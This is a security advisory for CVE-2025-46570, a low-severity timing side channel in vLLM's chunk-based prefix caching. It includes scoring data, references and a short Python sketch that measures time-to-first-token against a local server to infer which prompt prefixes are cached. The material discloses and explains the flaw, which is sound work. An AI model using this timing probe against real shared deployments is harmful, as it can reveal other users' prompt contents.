CVE-2025-46570: vLLM’s Chunk-Based Prefix Caching Vulnerable to Potential Timing Side-Channel

2.6 CVSS

Description

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed and the PagedAttention mechanism finds a matching cached prefix chunk, the prefill phase speeds up, which is reflected in a lower TTFT (Time to First Token). These chunk-match timing differences are significant enough to be observed, allowing an attacker to infer whether a given prefix is already present in the cache. This issue has been patched in version 0.9.0.
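
The side channel can be illustrated by timing the streamed response. The sketch below is illustrative only: it assumes a local vLLM server exposing its OpenAI-compatible API at http://localhost:8000/v1, and the model name, prompts, and api_key value are placeholders, not details taken from the advisory.

```python
import time
from openai import OpenAI

# Assumed local vLLM deployment; the endpoint, model name, and prompts
# below are hypothetical placeholders.
client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

def time_to_first_token(prompt: str) -> float:
    """Return seconds elapsed until the first streamed completion event."""
    start = time.perf_counter()
    stream = client.completions.create(
        model="meta-llama/Llama-3.1-8B-Instruct",  # placeholder model
        prompt=prompt,
        max_tokens=1,
        stream=True,
    )
    for _ in stream:  # the first event marks the first token
        return time.perf_counter() - start
    return float("inf")

# If the first prompt matches a chunk already in the prefix cache, its
# TTFT should be measurably lower than that of an uncached prompt: the
# observable timing discrepancy (CWE-208) described above.
cached = time_to_first_token("shared prefix followed by attacker text")
uncached = time_to_first_token("a prompt with no cached prefix")
print(f"cached TTFT={cached:.4f}s  uncached TTFT={uncached:.4f}s")
```

In practice an attacker would repeat such measurements and compare averages to separate cache-hit timing from ordinary network and scheduling jitter.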

Classification

CVE ID: CVE-2025-46570

CVSS Base Severity: LOW

CVSS Base Score: 2.6

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

Problem Types

CWE-208: Observable Timing Discrepancy

Affected Products

Vendor: vllm-project

Product: vllm

Exploit Prediction Scoring System (EPSS)

EPSS Score: 0.03% (estimated probability of exploitation activity in the next 30 days)

EPSS Percentile: 5.86% (proportion of vulnerabilities with an equal or lower EPSS score)

EPSS Date: 2025-05-30 (date the score was calculated)

References

https://nvd.nist.gov/vuln/detail/CVE-2025-46570
https://github.com/vllm-project/vllm/security/advisories/GHSA-4qjh-9fv9-r85r
https://github.com/vllm-project/vllm/pull/17045
https://github.com/vllm-project/vllm/commit/77073c77bc2006eb80ea6d5128f076f5e6c6f54f

Timeline